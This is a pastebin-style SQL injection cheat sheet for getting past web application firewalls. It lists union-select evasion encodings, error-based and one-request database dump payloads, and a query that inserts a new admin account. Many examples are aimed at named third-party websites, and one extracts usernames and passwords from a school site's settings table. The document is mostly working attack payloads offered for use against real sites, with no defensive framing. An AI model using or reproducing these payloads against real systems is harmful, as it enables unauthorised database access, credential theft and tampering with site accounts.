GLADzTeguhID

WAF BYPASS

Nov 4th, 2016
  1. --'- : +--+ / : -- - : --+- : /*
  2. ) order by 1-- -
  3. ') order by 1-- -
  4.  
  5. ')order by 1%23%23
  6.  
  7. %')order by 1%23%23
  8.  
  9. Null' order by 100--+
  10.  
  11. Null' order by 9999--+
  12.  
  13. ')group by 99-- -
  14.  
  15. 'group by 119449-- -
  16.  
  17. 'group/**/by/**/99%23%23
  18.  
  19. union select ByPassing method
  20.  
  21. +union+distinct+select+
  22.  
  23. +union+distinctROW+select+
  24.  
  25. /**//*!12345UNION SELECT*//**/
  26.  
  27. /**//*!50000UNION SELECT*//**/
  28.  
  29. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  30.  
  31. +/*!u%6eion*/+/*!se%6cect*/+
  32.  
  33. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  34.  
  35. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  36.  
  37. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  38.  
  39. union /*!50000%53elect*/
  40.  
  41. %55nion %53elect
  42.  
  43. +--+Union+--+Select+--+
  44.  
  45. +UnIoN/*&a=*/SeLeCT/*&a=*/
  46.  
  47. id=1+’UnI”On’+'SeL”ECT’
  48.  
  49. id=1+'UnI'||'on'+SeLeCT'
  50.  
  51. UnIoN SeLeCt CoNcAt(version())--
  52.  
  53. uNiOn aLl sElEcT
  54.  
  55. uUNIONnion all sSELECTelect
  56.  
  57.  
  58. :: Buffer Overflow ::
  59.  
  60. +And(select 1)=(select 0×414)+union+select+1–
  61.  
  62. +And(select 1)=(select 0xAAAA)+union+select+1–
  63.  
  64. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 1414141)+
  65.  
  66. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  67.  
  68.  
  69. :: 400 Bad Request ::
  70.  
  71. –+%0A
  72.  
  73. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  74.  
  75. null the parameter
  76.  
  77. id=-1
  78.  
  79. id=null
  80.  
  81. id=1+and+false+
  82.  
  83. id=9999
  84.  
  85. id=1 and 0
  86.  
  87. id==1
  88.  
  89. id=(-1)
  90.  
  91. Group_Concat
  92.  
  93. group_concat()
  94.  
  95. /*!group_concat*/()
  96.  
  97. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  98.  
  99. group_concat(,0x3c62723e)
  100.  
  101. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  102.  
  103. CoNcAt()
  104.  
  105. CONCAT(DISTINCT Version())
  106.  
  107. concat(,0x3a,)
  108.  
  109. concat%00()
  110.  
  111. %00CoNcAt()
  112.  
  113. /*!50000cOnCat*/(/*!Version()*/)
  114.  
  115. /*!50000cOnCat*/
  116.  
  117. /**//*!12345cOnCat*/(,0x3a,)
  118.  
  119. concat_ws()
  120.  
  121. concat(0x3a,,0x3c62723e)
  122.  
  123. /*!concat_ws(0x3a,)*/
  124.  
  125. concat_ws(0x3a3a3a,version()
  126.  
  127. CONCAT_WS(CHAR(32,58,32),version(),)
  128.  
  129. REVERSE(tacnoc)
  130.  
  131. binary(version())
  132.  
  133. uncompress(compress(version()))
  134.  
  135. aes_decrypt(aes_encrypt(version(),1),1)
  136.  
  137.  
  138. To appear column numbEr in page put after id ---->
  139.  
  140. id=1+and+1=0+union+select+1,2,3,4,5,6
  141.  
  142. +AND+1=0
  143.  
  144. /*!aND*/ 1 like 0
  145.  
  146. +/*!and*/+1=0
  147.  
  148. +and+2>3+
  149.  
  150. +and(1)=(0)
  151.  
  152. and (1)!=(0)
  153.  
  154. +div+0
  155.  
  156. Having+1=0
  157.  
  158. Function ByPassing ---->
  159.  
  160. unhex(hex(value))
  161.  
  162. cast(value as char)
  163.  
  164. uncompress(compress(version()))
  165.  
  166. cast(version() as char)
  167.  
  168. aes_decrypt(aes_encrypt(version(),1),1)
  169.  
  170. binary(version())
  171.  
  172. convert(value using ascii)
  173.  
  174. Avoid source page injection --->
  175.  
  176. concat(?”>,
  177.  
  178. ,@@version,?
  179.  
  180. “>
  181. ?
  182.  
  183. injection
  184.  
  185. concat(0x223e,@@version)
  186.  
  187. concat(0x273e27,version(),0x3c212d2d)
  188.  
  189. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  190.  
  191. concat(0x223e,@@version,0x3c696d67207372633d22)
  192.  
  193. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62​723e)
  194.  
  195. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  196.  
  197. concat(‘’,@@version,’’)
  198.  
  199. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  200.  
  201. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  202.  
  203.  
  204. get version – DB_NAME – user – HOST_NAME – datadir
  205. ----->
  206. version()
  207.  
  208. convert(version() using latin1)
  209.  
  210. unhex(hex(version()))
  211.  
  212. @@GLOBAL.VERSION
  213.  
  214. (substr(@@version,1,1)=5) :: 1 true 0 false
  215.  
  216. like -->
  217. http : //www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  218.  
  219.  
  220. +and substring(version(),1,1)=4
  221.  
  222. +and substring(version(),1,1)=5
  223.  
  224. +and substring(version(),1,1)=9
  225.  
  226. +and substring(version(),1,1)=10
  227.  
  228. id=1 /*!50094aaaa*/ error
  229.  
  230. id=1 /*!50095aaaa*/ no error
  231.  
  232. id=1 /*!50096aaaa*/ error
  233.  
  234. like --->
  235. http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  236.  
  237. id=1 /*!40123 1=1*/–+- no error
  238.  
  239. id=1 /*!40122rrrr*/ no error
  240.  
  241. like -->
  242. http : //www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  243.  
  244. DB_NAME() --->
  245. @@database
  246. database()
  247. id=vv()
  248.  
  249. like -->
  250. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  251.  
  252. http : // http://www.marinaplast.com/page.php?id=vv()
  253. @@user
  254. user()
  255. user_name()
  256. system_user()
  257. like -->
  258. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  259.  
  260. HOST_NAME()
  261. @@hostname
  262. @@servername
  263. SERVERPROPERTY()
  264.  
  265. like --->
  266. http : / / http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  267. @@datadir
  268. datadir()
  269. like --> http : / /www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  270. ASPX
  271. and 1=0/@@version
  272. ‘ and 1=0/@@version;–
  273. ‘) and 1=@@version–
  274. and 1=0/user;–
  275.  
  276. Requested method
  277. [DUMP DB in 1 Request]
  278.  
  279. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  280.  
  281. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  282.  
  283. [DUMP DB in 1 Request improve]
  284.  
  285. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where​(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,​0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  286.  
  287. like
  288. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c​ oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  289.  
  290. #2#
  291.  
  292. method like DUMP DB in 1 Request
  293.  
  294. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  295. like
  296. http : // http://www.mishnetorah.com/shop/details....T(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  297.  
  298. #3#
  299. databases
  300.  
  301. (select+count(schema_name) +from+information_schema.schemata)
  302.  
  303. # like #
  304. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  305.  
  306. tables
  307. (select+count(table_name) +from+information_schema.tables)
  308. # like #
  309. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  310.  
  311. columns
  312. (select+count(column_name) +from+information_schema.columns)
  313. # like #
  314. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  315.  
  316. #4#
  317.  
  318. show the table with all its columns
  319.  
  320. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  321.  
  322. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  323.  
  324. like
  325. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  326.  
  327. #5#WAF filtered requested
  328.  
  329. # tables #
  330. group_concat(/*!table_name*/)
  331.  
  332. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  333.  
  334. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  335.  
  336. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  337.  
  338. # columns #
  339.  
  340. group_concat(/*!column_name*/)
  341.  
  342. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  343.  
  344. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  345.  
  346. /*!froM*/ table– -
  347.  
  348. #6#
  349.  
  350. bypass method
  351.  
  352. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  353.  
  354. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  355.  
  356. like
  357. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  358.  
  359. #7#
  360.  
  361. bypass method
  362.  
  363. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  364.  
  365. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  366.  
  367. like
  368. http : // http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  369.  
  370.  
  371. [+] Buffer overflow:
  372.  
  373. +And(select 1)=(select 0×414)+union+select+1–
  374. +And(select 1)=(select 0xAAAA)+union+select+1–
  375. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  376. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  377. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414​ 14141414141414141414141414141414141414141414141414141414141414141414141414141414​ 1414141414141414141414141414141414141414141414141414141414141414141414141414?141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 41414141414141414141414141414141414141414141414141414141414141414141414141414141​ 4141)+
  378.  
  379. [+] Group Concat:
  380.  
  381. Group_Concat
  382. group_concat()
  383. /*!group_concat*/()
  384. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  385. group_concat(,0x3c62723e)
  386. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  387. CoNcAt()
  388. CONCAT(DISTINCT Version())
  389. concat(,0x3a,)
  390. concat%00()
  391. %00CoNcAt()
  392. /*!50000cOnCat*/(/*!Version()*/)
  393. /*!50000cOnCat*/
  394. /**//*!12345cOnCat*/(,0x3a,)
  395. concat_ws()
  396. concat(0x3a,,0x3c62723e)
  397. /*!concat_ws(0x3a,)*/
  398. concat_ws(0x3a3a3a,version()
  399. CONCAT_WS(CHAR(32,58,32),version(),)
  400.  
  401. ERROR BASED
  402.  
  403. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  404.  
  405. Database
  406.  
  407. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  408.  
  409. Table_name
  410.  
  411. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  412.  
  413. Columns
  414.  
  415. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  416.  
  417. extract data
  418.  
  419. http : // http://www.aliqbalschools.org/index.php?...&pageID=21 and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  420.  
  421. Notice the LIMIT clause in the query
  422. A website can have more than two databases, so increase the limit until you find all database names
  423. Example: limit 0,1 or limit 1,1 or limit 2,1
  424.  
  425. Differences:
  426. Error Based Query for Database Extraction:
  427.  
  428. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  429.  
  430. Double Query for Database Extraction:
  431.  
  432. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  433. information_schema.tables group by x)a) and 1=1
  434.  
  435. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  436. concat(0x7e,0×27,cast(schema_name as char),0×27,0x7e) FROM information_schema.schemata LIMIT N,1)) from
  437. information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
  438.  
  439. and(select 1 from(select count(*),concat((select (select (SELECT distinct
  440. concat(0x7e,0×27,cast(table_name as char),0×27,0x7e) FROM information_schema.tables Where
  441. table_schema=0xhex_code_of_database_name LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  442. information_schema.tables group by x)a) and 1
  443.  
  444.  
  445. http : //zerocoolhf.altervista.org/level2.php?id=-1%27%20union%20select%20*%20from%28%28select%201%29a%20join%20%28select%20versio​n%28%29%29b%20join%20%28select%20database%28%29%29c%29–+
  446.  
  447. union select 1,group_concat(column_name),3 FROM information_schema.columns WHERE table_name=concat(’0x’, hex(‘users’)
  448.  
  449. =113′+and+0+union+select+1,(SELECT (@) FROM (SELECT(@:=0×00),(SELECT (@) FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x3C7363726970743E616C6572742827,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name,0x27293B3C2F7363726970743E))))x),3–+–
  450.  
  451. injection in sql database: add new user
  452. INSERT INTO admins (`name`,`password`,`email`) VALUES (‘unix’,'unixunix’,'unix_chro@yahoo.com’)
  453.  
  454. +and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_nam​ e+as+char),0x7e))+from+information_schema.tables+where+table_schema=0xDATABASEHE​ X+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  455.  
  456. CHALLENGES
  457.  
  458. Code:
  459. =(13)and(0)union(select(1),group_concat(column_name,0x3c62723e),(3)from(informat​ion_schema.columns)where(table_schema=database())and(table_name=0×73656375726974​79))–+-
  460. =12+and+false/*!union*/ /*!select*/1,group_concat(0x3c62723e,/*!TabLe_NaMe*/),2,concat(user(),0x2a,database(),0x2a,version()),13,0x3c666f6e7420636f6c6f723d6​26c75653e3c68323e706833776c,15 from information_schema.tables where table_schema=0x66616272697a696f5f636572697070 LiMit 0,1–
  461. =/*!uNiOn*/ /*!SeLeCt*/ 1,concat(/*!version(),0x3a,0x3a,AdMinLoGiN,0x3a,0x3a*/),3 /*!fRoM*/ security–
  462. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  463. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  464. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  465. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  466.  
  467. Error Based:
  468.  
  469. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  470.  
  471. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  472.  
  473. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  474. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  475.  
  476. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  477.  
  478. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  479.  
  480. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+​ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_​ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  481.  
  482. or 1=convert(int,(@@version))-
  483. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  484. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0,​ 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  485.  
  486. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75​653e706833776c,7,8,9,(10))–+-
  487.  
  488.  
  489. =1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)wh​ere(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x20202​03d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  490.  
  491. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  492. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  493.  
  494. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  495.  
  496. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  497.  
  498. ------------Best Bypass WAF------------
  499.  
  500. http://pastebin.com/YFJHXAEF
  501.  
  502. [~] after id no. like id=1 +/*!and*/+1=0 [~]
  503. +div+0
  504. Having+1=0
  505. +AND+1=0
  506. +/*!and*/+1=0
  507. and(1)=(0)
  508. when the --+- or -- doesn't work use ;%00
  509.  
  510. Bypass error 505
  511. sometimes when union select ,sites become 505 or time out....
  512. bypass-
  513. -use brackets
  514. union(select+1)
  515. -use %0b or /**/ as space
  516. union%0bselect